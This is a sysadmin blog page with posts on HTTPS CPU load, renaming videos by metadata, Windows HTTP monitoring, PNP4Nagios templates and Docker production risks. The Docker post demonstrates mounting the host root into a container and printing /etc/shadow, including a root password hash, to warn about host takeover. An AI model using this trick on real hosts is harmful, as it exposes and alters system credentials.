
Encrypted http connections (https) use four times more CPU resources
Thursday - Jan 19th 2017

Yesterday we finally enabled encrypted HTTP using TLS connections on https://www.nzz.ch, one of the largest newspapers in Switzerland. Besides the "switch" on the load balancers - which was the easy part - there was a lot of work involved between many different teams and external service providers. During the kickoff meeting a few weeks ago I was asked how the load balancers would perform once we enabled HTTPS. I knew that the additional encryption of the HTTP traffic would use more CPU (every connection needs to be en- and decrypted), but I couldn't give an accurate number. One thing I was sure of: we're not in the 90's anymore and the servers can handle additional load.

Well, yesterday was the big day, and as soon as I forced the redirect from http to https, the CPU load went up. The network traffic itself stayed the same, so the increased CPU usage is caused by the TLS encryption. But see for yourself:
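The actual load balancer configuration is not shown here, but such a forced redirect is typically a one-liner. A hypothetical minimal sketch, assuming an nginx-based balancer (the real setup may look different):

```nginx
# Answer every plain-http request with a permanent redirect to https
server {
    listen 80;
    server_name www.nzz.ch;
    return 301 https://$host$request_uri;
}
```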

Encrypted http traffic causes more cpu load 

Based on these graphs it's fair to say that encrypted HTTP traffic uses around four times more CPU than before.

 

Rename video files to filename with recorded date using mediainfo
Monday - Jan 16th 2017

In my family we use videos - of course - to document our kids growing up. Compared to our parents in the 80's, there isn't just one video camera available; nowadays we have cameras everywhere we look. Especially the cameras on mobile phones are handy for shooting short films.

The problem with several video sources, however, is that each source has its own file naming scheme (let alone the video and audio encoding). I found it especially annoying when I wanted to sort the videos by their recording date. Android in particular has the problem that you cannot use the "modified date" of the video file as the recorded date. Example: when you move all your photos and videos from the internal to the external SD card, the modified timestamp changes, and therefore they all end up with the same date.

Luckily video files contain metadata with a lot of information about the used encoding and the recorded date! This information can be retrieved using "mediainfo":

# mediainfo MOV_1259.mp4
General
Complete name                            : MOV_1259.mp4
Format                                   : MPEG-4
Format profile                           : Base Media / Version 2
Codec ID                                 : mp42
File size                                : 53.7 MiB
Duration                                 : 25s 349ms
Overall bit rate                         : 17.8 Mbps
Encoded date                             : UTC 2015-11-21 10:04:28
Tagged date                              : UTC 2015-11-21 10:04:28

Video
ID                                       : 1
Format                                   : AVC
Format/Info                              : Advanced Video Codec
Format profile                           : High@L4.0
Format settings, CABAC                   : Yes
Format settings, ReFrames                : 1 frame
Format settings, GOP                     : M=1, N=18
Codec ID                                 : avc1
Codec ID/Info                            : Advanced Video Coding
Duration                                 : 25s 349ms
Bit rate                                 : 17.5 Mbps
Width                                    : 1 920 pixels
Height                                   : 1 080 pixels
Display aspect ratio                     : 16:9
Frame rate mode                          : Variable
Frame rate                               : 29.970 fps
Minimum frame rate                       : 29.811 fps
Maximum frame rate                       : 30.161 fps
Color space                              : YUV
Chroma subsampling                       : 4:2:0
Bit depth                                : 8 bits
Scan type                                : Progressive
Bits/(Pixel*Frame)                       : 0.281
Stream size                              : 52.8 MiB (98%)
Title                                    : VideoHandle
Language                                 : English
Encoded date                             : UTC 2015-11-21 10:04:28
Tagged date                              : UTC 2015-11-21 10:04:28

Audio
ID                                       : 2
Format                                   : AAC
Format/Info                              : Advanced Audio Codec
Format profile                           : LC
Codec ID                                 : 40
Duration                                 : 25s 335ms
Duration_FirstFrame                      : 13ms
Bit rate mode                            : Constant
Bit rate                                 : 156 Kbps
Nominal bit rate                         : 96.0 Kbps
Channel(s)                               : 2 channels
Channel positions                        : Front: L R
Sampling rate                            : 48.0 KHz
Compression mode                         : Lossy
Stream size                              : 483 KiB (1%)
Title                                    : SoundHandle
Language                                 : English
Encoded date                             : UTC 2015-11-21 10:04:28
Tagged date                              : UTC 2015-11-21 10:04:28
mdhd_Duration                            : 25335

Told you there's a lot of meta information.

What I needed in this case was the line "Encoded date" - the day and time the video was encoded/recorded. Using this information, I am able to rename all the video files.

Simulation first:

# ls | grep "^MOV" | while read line; do targetname=$(mediainfo $line | grep "Encoded date" | sort -u | awk '{print $5"-"$6}'); echo "Old name: $line, new name: ${targetname}.mp4"; done
Old name: MOV_0323.mp4, new name: 2015-03-08-17:24:27.mp4
Old name: MOV_0324.mp4, new name: 2015-03-13-19:12:33.mp4
Old name: MOV_0325.mp4, new name: 2015-03-13-19:18:40.mp4
Old name: MOV_0329.mp4, new name: 2015-03-18-18:41:55.mp4
Old name: MOV_0355.mp4, new name: 2015-03-21-10:05:55.mp4
Old name: MOV_0369.mp4, new name: 2015-03-22-08:38:06.mp4
Old name: MOV_0370.mp4, new name: 2015-03-22-08:38:44.mp4
Old name: MOV_0371.mp4, new name: 2015-03-22-08:39:36.mp4
Old name: MOV_0372.mp4, new name: 2015-03-22-14:05:30.mp4
Old name: MOV_0374.mp4, new name: 2015-03-24-18:31:21.mp4
Old name: MOV_0375.mp4, new name: 2015-03-24-18:31:52.mp4
Old name: MOV_0392.mp4, new name: 2015-03-28-10:54:17.mp4
[...]

And final renaming:

# ls | grep "^MOV" | while read line; do targetname=$(mediainfo $line | grep "Encoded date" | sort -u | awk '{print $5"-"$6}'); echo "Old name: $line, new name: ${targetname}.mp4"; mv $line ${targetname}.mp4; done
Old name: MOV_0323.mp4, new name: 2015-03-08-17:24:27.mp4
Old name: MOV_0324.mp4, new name: 2015-03-13-19:12:33.mp4
Old name: MOV_0325.mp4, new name: 2015-03-13-19:18:40.mp4
Old name: MOV_0329.mp4, new name: 2015-03-18-18:41:55.mp4
Old name: MOV_0355.mp4, new name: 2015-03-21-10:05:55.mp4
Old name: MOV_0369.mp4, new name: 2015-03-22-08:38:06.mp4
Old name: MOV_0370.mp4, new name: 2015-03-22-08:38:44.mp4
Old name: MOV_0371.mp4, new name: 2015-03-22-08:39:36.mp4
Old name: MOV_0372.mp4, new name: 2015-03-22-14:05:30.mp4
Old name: MOV_0374.mp4, new name: 2015-03-24-18:31:21.mp4
Old name: MOV_0375.mp4, new name: 2015-03-24-18:31:52.mp4
Old name: MOV_0392.mp4, new name: 2015-03-28-10:54:17.mp4
[...]

Yes, looks good! With this approach I can now unify the file names from all the different video sources and save them according to their real recording date.
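For file names containing spaces, the one-liner above needs quoting around the variables. A slightly more defensive sketch of the same rename (same mediainfo/grep logic as above; drop the echo prefix to actually rename):

```shell
# Derive the target name from a mediainfo "Encoded date" value,
# e.g. "UTC 2015-11-21 10:04:28" -> "2015-11-21-10:04:28.mp4"
target_name() {
  printf '%s' "$1" | awk '{print $2"-"$3".mp4"}'
}

for f in MOV_*.mp4; do
  [ -e "$f" ] || continue   # skip when the glob matched nothing
  encdate=$(mediainfo "$f" | grep "Encoded date" | sort -u \
            | awk -F' : ' '{print $2}')
  echo mv "$f" "$(target_name "$encdate")"
done
```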

 

Simple HTTP check monitoring plugin on Windows (check_http alternative)
Thursday - Jan 5th 2017

I was looking for a way to run a monitoring plugin similar to check_http on a Windows OS. The plugin itself would be executed through NRPE (using an NSClient installation) and report the HTTP connectivity from the point of view of this Windows server.

I came across some scripts, including some TCP port checks (worth mentioning: Protocol.vbs), some overblown PowerShell scripts and also a kind of check_tcp fork for Windows. Unfortunately none of them really did what I needed. So I built my own little VBScript, put together from information found on the following pages, using the MSXML2.ServerXMLHTTP object:

In the end the script looks like this:

url = "ENTER_FULL_URL_HERE"
Set http = CreateObject("MSXML2.ServerXMLHTTP")
http.open "GET",url,false
http.send
If http.Status = 200 Then
  wscript.echo "HTTP OK - " & url & " returns " & http.Status
  exitCode = 0
ElseIf http.Status >= 400 And http.Status < 500 Then
  wscript.echo "HTTP WARNING - " & url & " returns " & http.Status
  exitCode = 1
Else
  wscript.echo "HTTP CRITICAL - " & url & " returns " & http.Status
  exitCode = 2
End If

WScript.Quit(exitCode)

First define the URL in the first line (e.g. https://www.google.com) and then execute the script using cscript (without cscript you get the script's output as a dialog box):

C:\Users\Claudio\Documents>cscript check_http.vbs
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

HTTP OK - https://www.google.com returns 200

Or hitting a page not found error:

C:\Users\Claudio\Documents>cscript check_http.vbs
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

HTTP WARNING - https://www.google.com/this-should-not-exist returns 404

There's still much room to improve the script. It would be very nice to pass "url" as a command line argument. Maybe I'll get to that some time.

Finally, in nsclient.ini the script was defined so it can be called as an NRPE command:

; External scripts
[/settings/external scripts]
allow arguments=true
allow nasty characters=true
[/settings/external scripts/scripts]
check_http_google=scripts\\check_http_google.vbs

 

Creating custom PNP4Nagios templates in Icinga 2 for NRPE checks
Tuesday - Jan 3rd 2017

Since my early Nagios days (2005), I've used Nagiosgraph as my graphing service of choice. But in the last few years, other technologies came up. PNP4Nagios has become the de facto graphing standard for Nagios and Icinga installations. On big setups with several hundred hosts and thousands of services this is a wise choice; PNP4Nagios is a lot faster than Nagiosgraph. But Nagiosgraph can be adapted more easily to create custom graphs using the "map" file. That's why I ran PNP4Nagios and Nagiosgraph in parallel for the last few years on my Icinga 2 installation.

The main reason why I couldn't get rid of Nagiosgraph was the performance data retrieved by plugins executed through check_nrpe. For example the monitoring plugin check_netio:

$ /usr/lib/nagios/plugins/check_nrpe -H remotehost -c check_netio -a eth0
NETIO OK - eth0: RX=2849414346, TX=1809023474|NET_eth0_RX=2849414346B;;;; NET_eth0_TX=1809023474B;;;;

The plugin reads the RX and TX values from the ifconfig command. As we know, these are counter values: a value which starts at 0 (at boot time) and increases with the number of bytes passed through that interface.
While a check_disk through NRPE produces correct graphs in PNP4Nagios, the mentioned check_netio didn't:
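These are the same ever-increasing counters the kernel exposes in /proc/net/dev, which is where ifconfig gets them from. A quick sketch (the interface name is an assumption; check_netio itself may parse this differently):

```shell
# Print the raw RX/TX byte counters for one interface from /proc/net/dev.
# Column 1 after the colon is rx_bytes, column 9 is tx_bytes.
iface=lo
grep "$iface:" /proc/net/dev | awk -F: '{print $2}' | awk '{print "RX="$1" TX="$9}'
```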

PNP4Nagios NRPE check_disk graph
PNP4Nagios NRPE check_netio graph FAIL

The first graph on top shows the values from a check_disk plugin. The second graph below represents the values from the check_netio plugin. Both plugins were executed through NRPE on the remote host.

The comparison between the two graphs shows pretty clearly that only gauge values (GAUGE in RRD terms; a good example: temperature) are graphed correctly. The counter values are shown with their ever-increasing raw value instead of the rate of change between two samples.
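What a counter graph should display is the rate between two samples, not the raw values. In shell terms (the second sample is a made-up value for illustration):

```shell
# Rate calculation as RRD does it for COUNTER/DERIVE data sources:
# (current sample - previous sample) / seconds between the samples.
prev=2849414346   # RX counter from the check_netio example above
curr=2849414946   # hypothetical sample taken 60 seconds later
interval=60
echo "$(( (curr - prev) / interval )) B/s"
```

This prints "10 B/s" - whereas the broken gauge graph plots the raw 2.8 billion.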

Where does this come from? Why doesn't PNP4Nagios reflect these values correctly? The problem can be found in the communication between Icinga 2 and PNP4Nagios.
Each time a host or service is checked in Icinga 2, the perfdata feature writes a performance data log file - by default in /var/spool/icinga2/perfdata. Inside such a log file Icinga 2 shows the following information:

$ cat /var/spool/icinga2/perfdata/service-perfdata*
[...]
DATATYPE::SERVICEPERFDATA    TIMET::1483441246    HOSTNAME::remotehost    SERVICEDESC::Network IO eth0    SERVICEPERFDATA::NET_eth0_RX=2316977534837B;;;; NET_eth0_TX=41612087322B;;;;    SERVICECHECKCOMMAND::nrpe    HOSTSTATE::UP    HOSTSTATETYPE::HARD    SERVICESTATE::OK    SERVICESTATETYPE::HARD
[...]

Take a closer look at the variable SERVICECHECKCOMMAND and you see that it only contains nrpe - for every remote plugin executed through NRPE, whether that is check_disk, check_netio, check_ntp or anything else.
So Icinga 2 feeds this information to poor PNP4Nagios, which of course thinks all the checks are the same (nrpe) and handles all the graphs exactly the same way (GAUGE by default). Which explains why the graphs for plugins with COUNTER results fail.

In order to tell PNP4Nagios that we're running different kinds of plugins and values behind NRPE, Icinga 2's PerfdataWriter needs to be adapted a little bit. I edited the default PerfdataWriter object called "perfdata":

$ cat /etc/icinga2/features-enabled/perfdata.conf
object PerfdataWriter "perfdata" {
  service_format_template = "DATATYPE::SERVICEPERFDATA\tTIMET::$icinga.timet$\tHOSTNAME::$host.name$\tSERVICEDESC::$service.name$\tSERVICEPERFDATA::$service.perfdata$\tSERVICECHECKCOMMAND::$service.check_command$$pnp_check_arg1$\tHOSTSTATE::$host.state$\tHOSTSTATETYPE::$host.state_type$\tSERVICESTATE::$service.state$\tSERVICESTATETYPE::$service.state_type$"
  rotation_interval = 15s
}

I only changed the definition of the service_format_template. All other configurable options are still at their defaults. And it is only a minor change, which in short looks like this:

SERVICECHECKCOMMAND::$service.check_command$$pnp_check_arg1$

With that change, Icinga 2's PerfdataWriter is ready. But the variable still needs to be set within the service object. As I use apply rules for such generic service checks as "Network IO", this was a quick modification in the apply rule of this service:

$ cat /etc/icinga2/zones.d/global-templates/applyrules/networkio.conf
apply Service "Network IO " for (interface in host.vars.interfaces) {
  import "generic-service"

  check_command = "nrpe"
  vars.nrpe_command = "check_netio"
  vars.nrpe_arguments = [ interface ]
  vars.pnp_check_arg1 = "_$nrpe_command$"

  assign where host.address && host.vars.interfaces && host.vars.os == "Linux"
  ignore where host.vars.applyignore.networkio == true
}

In this apply rule, where the "Network IO" service object is assigned to all Linux hosts (host.vars.os == "Linux") with existing interfaces (host.vars.interfaces), I simply added the value for the vars.pnp_check_arg1 variable. Which, in this case, is an underscore followed by the actual command launched by NRPE: "_check_netio".

After a reload of Icinga 2 and a manual check of the performance log file, everything looks good. Which means: the SERVICECHECKCOMMAND now contains both nrpe and the remote command (nrpe_check_netio):

$ cat /var/spool/icinga2/perfdata/service-perfdata*
[...]
DATATYPE::SERVICEPERFDATA    TIMET::1483441246    HOSTNAME::remotehost    SERVICEDESC::Network IO eth0    SERVICEPERFDATA::NET_eth0_RX=2316977634837B;;;; NET_eth0_TX=41612088322B;;;;    SERVICECHECKCOMMAND::nrpe_check_netio    HOSTSTATE::UP    HOSTSTATETYPE::HARD    SERVICESTATE::OK    SERVICESTATETYPE::HARD
[...]

Icinga 2 now gives correct and unique information to PNP4Nagios. But PNP4Nagios still needs to be told what to do. PNP4Nagios parses every line of the performance data it gets from Icinga 2 and checks if there is a template for the found command. Prior to the changes in the PerfdataWriter this was always just "nrpe", so PNP4Nagios used the following file: /etc/pnp4nagios/check_commands/check_nrpe.cfg. This is a standard file which comes with the PNP4Nagios installation.
Now that the command is "nrpe_check_netio", PNP4Nagios checks if there is a command definition by that name. When log level >= 2 is activated in PNP4Nagios' perfdata process (set LOG_LEVEL to at least 2 in /etc/pnp4nagios/process_perfdata.cfg), the LOG_FILE (usually /var/log/pnp4nagios/perfdata.log) will show the following information:

$ cat /var/log/pnp4nagios/perfdata.log
[...]
2017-01-03 12:22:55 [15957] [3] DEBUG: RAW Command -> nrpe_check_netio
2017-01-03 12:22:55 [15958] [3]   -- name -> pl
2017-01-03 12:22:55 [15958] [3]   -- rrd_heartbeat -> 8460
2017-01-03 12:22:55 [15957] [2] No Custom Template found for nrpe_check_netio (/etc/pnp4nagios/check_commands/nrpe_check_netio.cfg)
[...]

PNP4Nagios now correctly understood that this is performance data for the command "nrpe_check_netio". And now we can create this config file and tell PNP4Nagios to create DERIVE graphs. DERIVE is another kind of COUNTER data type, with the difference that DERIVE values can be reset to 0, which is the case for the values in ifconfig.

$ cat /etc/pnp4nagios/check_commands/nrpe_check_netio.cfg
#
# Adapt the Template if check_command should not be the PNP Template
#
# check_command check_nrpe!check_disk!20%!10%
# ________0__________|          |      |  |
# ________1_____________________|      |  |
# ________2____________________________|  |
# ________3_______________________________|
#
CUSTOM_TEMPLATE = 1
#
# Change the RRD Datatype based on the check_command Name.
# Defaults to GAUGE.
#
# Adjust the whole RRD Database
DATATYPE = DERIVE
#
# Adjust every single DS by using a List of Datatypes.
DATATYPE = DERIVE,DERIVE

# Use the MIN value for newly created RRD Databases.
# This value defaults to 0
# USE_MIN_ON_CREATE = 1
#
# Use the MAX value for newly created RRD Databases.
# This value defaults to 0
# USE_MAX_ON_CREATE = 1

# Use a single RRD Database per Service
# This Option is only used while creating new RRD Databases
#
#RRD_STORAGE_TYPE = SINGLE
#
# Use multiple RRD Databases per Service
# One RRD Database per Datasource.
# RRD_STORAGE_TYPE = MULTIPLE
#
RRD_STORAGE_TYPE = MULTIPLE

# RRD Heartbeat in seconds
# This Option is only used while creating new RRD Databases
# Existing RRDs can be changed by "rrdtool tune"
# More on http://oss.oetiker.ch/rrdtool/doc/rrdtune.en.html
#
# This value defaults to 8640
# RRD_HEARTBEAT = 305


After a new check of a Network IO service, the xml file of that particular service was re-created with the following information:

# cat /var/lib/pnp4nagios/perfdata/remotehost/Network_IO_eth0.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<NAGIOS>
  <DATASOURCE>
    <TEMPLATE>nrpe_check_netio</TEMPLATE>
    <RRDFILE>/var/lib/pnp4nagios/perfdata/remotehost/Network_IO_eth0_NET_eth0_RX.rrd</RRDFILE>
    <RRD_STORAGE_TYPE>MULTIPLE</RRD_STORAGE_TYPE>
    <RRD_HEARTBEAT>8460</RRD_HEARTBEAT>
    <IS_MULTI>0</IS_MULTI>
    <DS>1</DS>
    <NAME>NET_eth0_RX</NAME>
    <LABEL>NET_eth0_RX</LABEL>
    <UNIT>B</UNIT>
    <ACT>1462883655</ACT>
    <WARN></WARN>
    <WARN_MIN></WARN_MIN>
    <WARN_MAX></WARN_MAX>
    <WARN_RANGE_TYPE></WARN_RANGE_TYPE>
    <CRIT></CRIT>
    <CRIT_MIN></CRIT_MIN>
    <CRIT_MAX></CRIT_MAX>
    <CRIT_RANGE_TYPE></CRIT_RANGE_TYPE>
    <MIN></MIN>
    <MAX></MAX>
  </DATASOURCE>
  <DATASOURCE>
    <TEMPLATE>nrpe_check_netio</TEMPLATE>
    <RRDFILE>/var/lib/pnp4nagios/perfdata/remotehost/Network_IO_eth0_NET_eth0_TX.rrd</RRDFILE>
    <RRD_STORAGE_TYPE>MULTIPLE</RRD_STORAGE_TYPE>
    <RRD_HEARTBEAT>8460</RRD_HEARTBEAT>
    <IS_MULTI>0</IS_MULTI>
    <DS>1</DS>
    <NAME>NET_eth0_TX</NAME>
    <LABEL>NET_eth0_TX</LABEL>
    <UNIT>B</UNIT>
    <ACT>1567726688</ACT>
    <WARN></WARN>
    <WARN_MIN></WARN_MIN>
    <WARN_MAX></WARN_MAX>
    <WARN_RANGE_TYPE></WARN_RANGE_TYPE>
    <CRIT></CRIT>
    <CRIT_MIN></CRIT_MIN>
    <CRIT_MAX></CRIT_MAX>
    <CRIT_RANGE_TYPE></CRIT_RANGE_TYPE>
    <MIN></MIN>
    <MAX></MAX>
  </DATASOURCE>
  <RRD>
    <RC>0</RC>
    <TXT>successful updated</TXT>
  </RRD>
  <NAGIOS_AUTH_HOSTNAME>remotehost</NAGIOS_AUTH_HOSTNAME>
  <NAGIOS_AUTH_SERVICEDESC>Network IO eth0</NAGIOS_AUTH_SERVICEDESC>
  <NAGIOS_CHECK_COMMAND>nrpe_check_netio</NAGIOS_CHECK_COMMAND>
  <NAGIOS_DATATYPE>SERVICEPERFDATA</NAGIOS_DATATYPE>
  <NAGIOS_DISP_HOSTNAME>remotehost</NAGIOS_DISP_HOSTNAME>
  <NAGIOS_DISP_SERVICEDESC>Network IO eth0</NAGIOS_DISP_SERVICEDESC>
  <NAGIOS_HOSTNAME>remotehost</NAGIOS_HOSTNAME>
  <NAGIOS_HOSTSTATE>UP</NAGIOS_HOSTSTATE>
  <NAGIOS_HOSTSTATETYPE>HARD</NAGIOS_HOSTSTATETYPE>
  <NAGIOS_MULTI_PARENT></NAGIOS_MULTI_PARENT>
  <NAGIOS_PERFDATA>NET_eth0_RX=1462883655B;;;; NET_eth0_TX=1567726688B;;;; </NAGIOS_PERFDATA>
  <NAGIOS_RRDFILE></NAGIOS_RRDFILE>
  <NAGIOS_SERVICECHECKCOMMAND>nrpe_check_netio</NAGIOS_SERVICECHECKCOMMAND>
  <NAGIOS_SERVICEDESC>Network_IO_eth0</NAGIOS_SERVICEDESC>
  <NAGIOS_SERVICEPERFDATA>NET_eth0_RX=1462883655B;;;; NET_eth0_TX=1567726688B;;;;</NAGIOS_SERVICEPERFDATA>
  <NAGIOS_SERVICESTATE>OK</NAGIOS_SERVICESTATE>
  <NAGIOS_SERVICESTATETYPE>HARD</NAGIOS_SERVICESTATETYPE>
  <NAGIOS_TIMET>1483442747</NAGIOS_TIMET>
  <NAGIOS_XMLFILE>/var/lib/pnp4nagios/perfdata/remotehost/Network_IO_eth0.xml</NAGIOS_XMLFILE>
  <XML>
   <VERSION>4</VERSION>
  </XML>
</NAGIOS>

The xml file shows that the nrpe_check_netio PNP4Nagios template is now used:

<TEMPLATE>nrpe_check_netio</TEMPLATE>

and the service check command is correctly identified as nrpe_check_netio:

<NAGIOS_CHECK_COMMAND>nrpe_check_netio</NAGIOS_CHECK_COMMAND>

Once /etc/pnp4nagios/check_commands/nrpe_check_netio.cfg was created, all the other hosts with this "Network IO" check were adapted and are now showing the correct graphs.

PNP4Nagios NRPE check_netio correct counter graph 

The same procedure can now be applied to all kinds of plugins which are executed through NRPE and output counter/derive values, for example check_diskio.
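For a hypothetical check_diskio behind NRPE, the same two steps would apply: set vars.pnp_check_arg1 = "_$nrpe_command$" in its apply rule, and create a template file along these lines (a sketch only; the file name follows the naming scheme above):

```
$ cat /etc/pnp4nagios/check_commands/nrpe_check_diskio.cfg
CUSTOM_TEMPLATE = 1
DATATYPE = DERIVE
RRD_STORAGE_TYPE = MULTIPLE
```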

 

check_esxi_hardware and pywbem 0.10.x tested
Wednesday - Dec 21st 2016

Yesterday a new version (0.10.0) of pywbem was released. Will the monitoring plugin check_esxi_hardware continue to run without a glitch? It should, since the plugin was "made ready" for future releases of pywbem (see New version of check_esxi_hardware supports pywbem 0.9.x).

Let's try check_esxi_hardware with the new pywbem version. I used pip to upgrade pywbem to the latest available version:

 $ sudo pip install --upgrade pywbem
Downloading/unpacking pywbem from https://pypi.python.org/packages/9a/50/839b059c351c4bc22c181c0f6a5817da7ca38cc0ab676c9a76fec373d5f5/pywbem-0.10.0-py2.py3-none-any.whl#md5=1bc01e6fd91f5e7ca64c058f3e0c1254
  Downloading pywbem-0.10.0-py2.py3-none-any.whl (201kB): 201kB downloaded
Requirement already up-to-date: PyYAML in /usr/local/lib/python2.7/dist-packages (from pywbem)
Requirement already up-to-date: six in /usr/local/lib/python2.7/dist-packages (from pywbem)
Requirement already up-to-date: ply in /usr/local/lib/python2.7/dist-packages (from pywbem)
Requirement already up-to-date: M2Crypto>=0.24 in /usr/local/lib/python2.7/dist-packages (from pywbem)
Requirement already up-to-date: typing in /usr/local/lib/python2.7/dist-packages (from M2Crypto>=0.24->pywbem)
Installing collected packages: pywbem
  Found existing installation: pywbem 0.9.0
    Uninstalling pywbem:
      Successfully uninstalled pywbem
Successfully installed pywbem
Cleaning up...

And then launched the plugin:

$ ./check_esxi_hardware.py -H esxiserver -U root -P secret -v
20161221 12:17:44 Connection to https://esxiserver
20161221 12:17:44 Found pywbem version 0.10.0
20161221 12:17:44 Check classe OMC_SMASHFirmwareIdentity
20161221 12:17:45   Element Name = System BIOS
20161221 12:17:45     VersionString = B200M4.3.1.2b.0.042920161158
[...]
20161221 12:17:49 Check classe VMware_SASSATAPort
OK - Server: Cisco Systems Inc UCSB-B200-M4 s/n: XXXXXXXX Chassis S/N: XXXXXXXX  System BIOS: B200M4.3.1.2b.0.042920161158 2016-04-29

As you can see, the new version works without problems. Go ahead and upgrade pywbem.

 

The Docker Dilemma: Benefits and risks going into production with Docker
Friday - Dec 16th 2016

Over a period of more than one year I've followed the Docker hype. What is it about? And why does it seem that all developers absolutely want to use Docker and no other container technology? Important note: although it may seem that I'm a sworn enemy of Docker, I am not! I find all kinds of new technologies interesting, to say the least. But I'm a skeptic, always have been, when it comes to phrases like "this is the ultimate solution to all your problems". So this article mainly documents the most important points I dealt with over a period of one year, mainly handling risks and misunderstandings and trying to find a solution for them.

When Docker first came up as a request (which then turned into a demand), I began my research. And I completely understood what Docker was about. Docker was created to fire up new application instances quickly and therefore allow greater and faster scalability. A good idea, basically, which sounds very interesting and makes sense - as long as your application can run independently. What I mean by that:

  • Data is stored elsewhere (not on local file system), for example in an object store or database which is accessed by the network layer
  • There are no hardcoded (internal) IP addresses in the code
  • The application is NOT run as root user, therefore not requiring privileged rights
  • The application is scalable and can run in parallel in several containers

But the first problems already arose. The developer in question (let's call him Dave) wanted to store data in the container. He didn't care if his application ran as root or not (I'm quoting: "At least then I got no permission problems"). And he wanted to access an existing NFS share from within the container.

I told him about Linux Containers and that this would be better solved with the LXC technology. To my big surprise, he didn't even know what LXC was. So not only was the original concept of Docker containers misunderstood, the origins of the project (Docker was originally based on LXC until it was eventually replaced by Docker's own library, libcontainer) were not even known. Another reason to use Docker, according to this developer: "I can just install any application as a Docker container I want - and I don't even need to know how to configure it." Good lord. It's as if I wanted to build a car myself just because I don't want anyone else to do it. The fact that I have no clue how to build a car obviously does not matter.

More or less in parallel, another developer from another dev team (let's call him Frank) was also pushing for Docker. He created his code in a Docker environment (which is absolutely fine) using a MongoDB in the background. It's important to understand that using a code library to access MongoDB and managing a MongoDB are entirely different things. So by installing MongoDB from a Docker image (he had found on the Internet) he had a working MongoDB, yes. But what about the tuning and security settings of MongoDB? These were left as is, because the knowledge of managing MongoDB was not there. As I've been managing MongoDB since 2013, I know where to find its most important weaknesses and how to tackle them (I wrote about this in an older article "It is 2015 and we still should not use MongoDB (POV of a Systems Engineer)"). If I had let this project go into production as is, the MongoDB would have been available to the whole wide world - without any authentication! So I was able to convince this developer that MongoDB should be run separately, managed separately, and most importantly: MongoDB stores persistent data. Don't run this as a Docker container.

While I was able to talk some sense into Frank, Dave still didn't see any issues or risks. So I created the following list to have an overview of unnecessary risks and problems:

  • Read-only file system (OverlayFS, layers per app): means you can temporarily alter files, but at the next boot of the container these changes are gone. You will have to redeploy the full container, even to fix a typo in a config file. This also means that security patches cannot simply be applied inside a running container; the image has to be rebuilt.
  • If you want to save persistent data, an additional mount of a data volume is required. Which adds complexity, dependencies and risks (see details further down in this article).
  • Shutdown/Reboot means data loss, unless you are using data volumes or your application is programmed smart enough to use object stores like S3 (cloud-ready).
  • If you use data volumes mounted from the host, you lose flexibility of the containers, because they're now bound to the host.
  • Docker containers are meant to run one application/process, no additional services and daemons. This makes troubleshooting hard, because direct SSH is not possible and monitoring and backup agents are not running. You can solve this by using a Docker image already prepped with all the necessary stuff. But if you add all this stuff anyway, LXC would be a better choice.
  • A crash of the application which crashes the container cannot be analyzed properly, because log files are not saved (unless, again, a separate data volume is used for the logs).
  • Not a full network stack: Docker containers are not "directly attached" to the network. They're connected through the host and connections go through Network Address Translation (NAT) firewall rules. This adds additional complexity when troubleshooting network problems.
  • The containers run as root and install external content from public registries (Docker Hub for example). Unless this is changed by using an internal and private Docker registry, this adds risks. What is installed? Who verified the integrity of the downloaded image/software? This is not just me saying this; it has been proven to be a security problem. See the InfoQ article Security vulnerabilities in Docker Hub Images.
  • OverlayFS/ReadOnly FS are less performant.
  • In general, troubleshooting a problem will take more time than on "classic" systems or Linux containers because of the additional complexity: the network stack, additional file system layers, data volume mounts, missing log files and image analysis.
  • Most of these problems can be solved with workarounds. For example by using your own registry with approved code. Or rewriting your application code to use object stores for file handling. Or creating custom base images which contain all your necessary settings and programs/daemons. Or using a central syslog server. But as we all know, workarounds mean additional work, which means costs.

Even with all these technical points, Dave went on with his "must use Docker for everything" monologue. He was even convinced that he wanted to manage all the servers himself, even database servers. I asked him why he'd want to do that in the first place and his answer was "So I can try a new MySQL version". Let's assume for a moment, that is a good idea and MySQL runs as a Docker container with an additional volume holding /var/lib/mysql. Now Dave deploys a new Docker container with a new MySQL version - being smart and shutting down the old version first. As soon as MySQL starts up, it will start running over the databases found in /var/lib/mysql. And upgrades the tables according to the new version (mainly the tables in the mysql database). And now let's assume after two days a new bug is found in the production app, that the current application code is not fully compatible with the newer MySQL version. You cannot downgrade to the older MySQL version anymore because tables were already altered. I've seen such problems in the past already (see Some notes on a MySQL downgrade 5.1 to 5.0). So I know the problems of downgrading already upgraded data. But obviously my experience and my warnings didn't count and were ignored.
Eventually Dave's team started to build their own hosting environment. I later heard that they had destroyed their ElasticSearch data, because something went wrong within their Docker environment and the data volume holding the ES data...

Meanwhile I continued my research and created my own test lab using plain Docker (without any orchestration). I came across several risks. Especially the volume mounts from the host caught my eye. A Docker container is able to mount any path from its host when the container is started (docker run). As a simple test, I created a Docker container with the following volume information:

docker run ... -v /:/tmp ...

The whole file system of the host was therefore mounted in the container as /tmp. With write permissions. Meaning you can delete your entire host's filesystem, by error or on purpose. You can read and alter the (hashed) passwords from /etc/shadow (in this case by simply accessing /tmp/etc/shadow in the container).

root@5a87a58982f9:/# cat /tmp/etc/shadow | head
root:$6$9JbiWxjT$QKL4M1GiRKwtQrJmgX657XvMW02u8KjOzxSaRRWhFaSJwcpLXLdJZwkD8QEwk0H
IaxzOlf.JtWcwVykXAex2..:17143:0:99999:7:::
daemon:*:17001:0:99999:7::: 
bin:*:17001:0:99999:7:::
sys:*:17001:0:99999:7:::
sync:*:17001:0:99999:7:::
games:*:17001:0:99999:7:::
man:*:17001:0:99999:7:::
lp:*:17001:0:99999:7:::
mail:*:17001:0:99999:7:::
news:*:17001:0:99999:7:::
root@5a87a58982f9:/#

Basically by being root in the container with such a volume mount, you take over the host - which is supposed to be the security guard for all containers. A nice article with another practical example can be found here: Using the docker command to root the host (totally not a security issue).

Another risk, less dangerous but still worth mentioning, is the mount of the host's Docker socket (/var/run/docker.sock) into a container. Such a container is then able to pull information about all containers running on the same host. This information sometimes contains environment variables, and some of these may contain cleartext passwords (e.g. to start up a service which connects to a remote DB with given credentials, see The Dangers of Docker.sock).
